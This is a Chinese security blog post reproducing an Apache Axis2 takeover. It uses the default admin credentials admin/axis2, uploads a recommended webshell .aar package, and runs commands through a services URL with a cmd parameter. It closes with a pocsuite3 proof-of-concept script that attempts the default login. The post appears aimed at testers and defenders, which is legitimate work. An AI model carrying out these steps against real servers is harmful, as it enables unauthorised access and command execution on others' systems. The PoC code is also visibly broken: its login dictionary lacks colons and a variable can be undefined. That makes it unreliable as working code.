【漏洞复现】Axis2默认弱口令后台Getshell
2022-11-24 00:0:39 Author: 白帽子(查看原文) 阅读量:44 收藏

1.Axis2简介

Axis2是下一代 Apache Axis。Axis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中。

Apache Axis2 是Axis的后续版本,是新一代的SOAP引擎。

2.漏洞类型

弱口令漏洞+上传arr包Getshell

推荐一个axis2的webshell  https://github.com/CaledoniaProject/AxisInvoker

axis2的webshell:运行ant -v以构建它,您可以在build目录中找到已编译的归档文件build/AxisInvoker.aar

3.漏洞详情

Axis2控制面板界面如下:

后台登录路径:http://ip:port/axis2/axis2-admin/

默认口令为:admin/axis2,登录后截图。

上传.aar包,如图所示:

根据GitHub Readme简介,访问对应URL进行命令执行,从而Getshell。如图所示:

http://ip:port/axis2/services/AxisInvoker/exec?cmd=ipconfig

pocsuite3 poc code

潮声漏洞检测平台已支持此漏洞检测:http://poc.tidesec.com/

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE

class DemoPOC(POCBase):
    vulID = 'XXXX'  # ssvid
    version = '1.0'
    author = ['VllTomFord']
    vulDate = '2019-12-13'
    createDate = '2019-12-13'
    updateDate = '2019-12-13'
    references = ['']
    name = 'Axis2弱口令Getshell'
    appPowerLink = ''
    appName = 'Axis2'
    appVersion = 'all'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''Axis2弱口令部署aar包Getshell'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _verify(self):
        result = {}
        path = "/axis2/axis2-admin/"
        r = requests.get(url = self.url+path)
        if "Login to Axis2" in r.text:
            loginpath = "/axis2/axis2-admin/login"
        # 字典方式
        data = {
            "userName""admin",
            "password""axis2",
            "submit""+Login+"
        }
        r = requests.post(url=self.url+loginpath, data=data)
        if "Upload Service" in r.text:
            result['FileInfo'] = {}

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

register_poc(DemoPOC)

4.参考链接

https://xz.aliyun.com/t/5832

https://www.ouyangxiaoze.com/2019/12/525.html

E

N

D

Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室,近三年来在网络安全技术方面开展研发项目60余项,获得各类自主知识产权30余项,省市级科技项目立项20余项,研究成果应用于产品核心技术研究、国家重点科技项目攻关、专业安全服务等。对安全感兴趣的小伙伴可以加入或关注我们。

我知道你在看


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246433&idx=2&sn=5ed798be762def577777a3fd13816066&chksm=82ea5688b59ddf9eb95d02a6110006a7ddba635d3fb9d3a6ba939890fa03ffebaa410c084312#rd
如有侵权请联系:admin#unsafe.sh